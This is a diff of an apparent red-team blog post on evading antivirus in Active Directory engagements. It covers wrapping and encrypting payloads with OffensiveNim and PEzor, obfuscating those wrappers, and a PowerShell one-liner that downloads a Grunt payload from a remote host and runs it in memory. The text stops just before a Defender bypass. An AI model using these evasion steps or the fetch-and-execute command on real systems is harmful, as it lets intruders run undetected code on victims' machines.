LuemmelSec/LuemmelSec.github.io/_posts/2021-01-16-Circumventing-Countermeasures-In-AD.md

 ### Wrapping and decrypting code

 If you are actively following the InfoSec community on twitter, you will most probably stumble upon [byt3bl33d3r´s](https://twitter.com/byt3bl33d3r) [Offensive Nim repo](https://github.com/byt3bl33d3r/OffensiveNim).
-These templates let you wrap your C# executable inside Nim and be compiled as C executable, thus hiding your content.
-Together with [s3cur3th1sh1t](https://twitter.com/ShitSecure) they even developed it further, so that you can have a decrypted payload inside the Nim binary, and have it decrypted at runtime in memory.
-This will make it way harder to impossible to reverse, if you have to put your files to disk, as decompiling will only reveal the encrypted C# stuff.
+These templates let you for example wrap your C# executable inside Nim and be compiled as C executable, thus hiding your content.
+Together with [s3cur3th1sh1t](https://twitter.com/ShitSecure) they even developed it further, so that you can have an encrypted payload inside the Nim binary, and decrypt at runtime in memory.
+This will make it harder to reverse, if you have to put your files to disk, as decompiling will only reveal the encrypted C# stuff.
 To learn more on this you can check out [Playing-with-OffensiveNim](https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/).

 There are also tools like [amber](https://github.com/EgeBalci/amber) or [PEzor](https://github.com/phra/PEzor), which will take C or C++ executables and reflectively load them into memory, adding some nice features like delayed execution too fool in memory scanners or avoiding AV user-land hooks and stuff.
 I don´t understand even half of the things that are going on here.
 But if you want to know more read [phra´s](https://twitter.com/phraaaaaaa) [blog](https://iwantmore.pizza/posts/PEzor.html) regarding PEZor.

-All the above mentioned methods can possibly help you obfuscate your code, so you don´t have to deploy the out of the box tools.
+All the methods mentioned abovecan possibly help you obfuscate your code, so you don´t have to deploy the out of the box tools.
 But be aware that by the time also the wrapper code will get flagged.
 I did a test with a simple ```hello world``` C executable wrapped with PEZor, and I got like 21 hits on VirusTotal.
-By now you should know what to do :) Obfuscate the wrappers.
+By now you should know what to do :) Obfuscate the templates.

 ### Not touching the disk

-Another approach is to try to not touch the disk with our malicious content, so that traditional AV is not able to catch us when reading or writing data.
+Another approach is to not touch the disk with our malicious content, so that traditional AV is not able to catch us when reading or writing data.
-The most well known technique to me is to use PowerShell´s Invoke Expression feature.
+The most well known technique to me is to use PowerShell´s native Invoke Expression function.
 It will allow you to download a script from a remote source and execute it in memory.
 ```
 iex(new-object net.webclient).downloadstring('http://10.55.0.30/grunt.ps1')
 ```

-Another possibility is to use [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) from - *who would have thought it* - S3cur3Th1sSh1t, to load and execute C# directly into memory.
+Another possibility is to use [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) from - *who would have thought it* - S3cur3Th1sSh1t, to load and execute C# directly from memory.

 Okay so let´s bypass Defender by not touching the disk and put our default Grunt payload directly into memory: